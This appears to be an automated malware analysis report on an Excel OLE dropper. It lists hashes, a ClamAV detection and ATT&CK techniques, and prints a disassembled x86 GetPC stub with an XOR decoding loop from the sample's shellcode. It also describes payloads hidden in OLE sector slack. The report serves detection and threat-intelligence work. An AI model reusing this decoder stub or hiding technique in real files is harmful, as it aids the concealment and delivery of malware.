Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04e41abd5eb4d560…

MALICIOUS

Office (OLE)

154.3 KB Created: 2011-05-12 09:56:45 Authoring application: Microsoft Excel First seen: 2015-09-19
MD5: 1993574629bfc9ef263227628b00fc70 SHA-1: 4c356814c33b849a98a66e1b1c10cfa9aa779e97 SHA-256: 04e41abd5eb4d5600693f0b82d1fcbff22928b18837c71b75d78615a6131a441
140 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-7370047-0. Heuristics indicate the presence of an exploit stub and a large slack region, suggesting an attempt to hide malicious code. The document body is heavily obfuscated and truncated, but the overall structure and detection point towards a dropper designed to execute a secondary payload.

Heuristics 3

  • ClamAV: Xls.Dropper.Agent-7370047-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7370047-0
  • x86 GetPC stub (CALL $+5; POP EDI) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EDI)
    Disassembly
    Attempted x86 opcode disassembly
    0000051E  e800000000        call 0x523
00000523  5f                pop edi
00000524  83c729            add edi, 0x29
00000527  66bb0735          mov bx, 0x3507
0000052B  57                push edi
0000052C  5e                pop esi
0000052D  33c9              xor ecx, ecx
0000052F  66b90402          mov cx, 0x204
00000533  66ad              lodsw ax, word ptr [esi]
00000535  6685c0            test ax, ax
00000538  740e              je 0x548
0000053A  668bd0            mov dx, ax
0000053D  6633d3            xor dx, bx
00000540  6685d2            test dx, dx
00000543  7403              je 0x548
00000545  668bc2            mov ax, dx
00000548  66ab              stosw word ptr es:[edi], ax
0000054A  e2e7              loop 0x533
0000054C  52                push edx
0000054D  beebb6eb75        mov esi, 0x75ebb6eb
00000552  54                push esp
00000553  635055            arpl word ptr [eax + 0x55], dx
00000556  63be12050000      arpl word ptr [esi + 0x512], di
0000055C  07                pop es
0000055D  dca734000088      fsub qword ptr [edi - 0x77ffffcc]
00000563  70f3              jo 0x558
00000565  be45398c45        mov esi, 0x458c3945
0000056A  1b988c4d0fbc      sbb ebx, dword ptr [eax - 0x43f0b274]
00000570  7ad1              jp 0x543
00000572  8c                .byte 0x8c
00000573  723b              jb 0x5b0
00000575  be53327f36        mov esi, 0x367f3253
0000057A  d0                .byte 0xd0
0000057B  be                .byte 0xbe
0000057C  5d                pop ebp
0000057D  15                .byte 0x15
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 157,972 bytes but its declared streams total only 29,612 bytes — 128,360 bytes (81%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Open this report in the interactive analyzer, or submit your own file for analysis.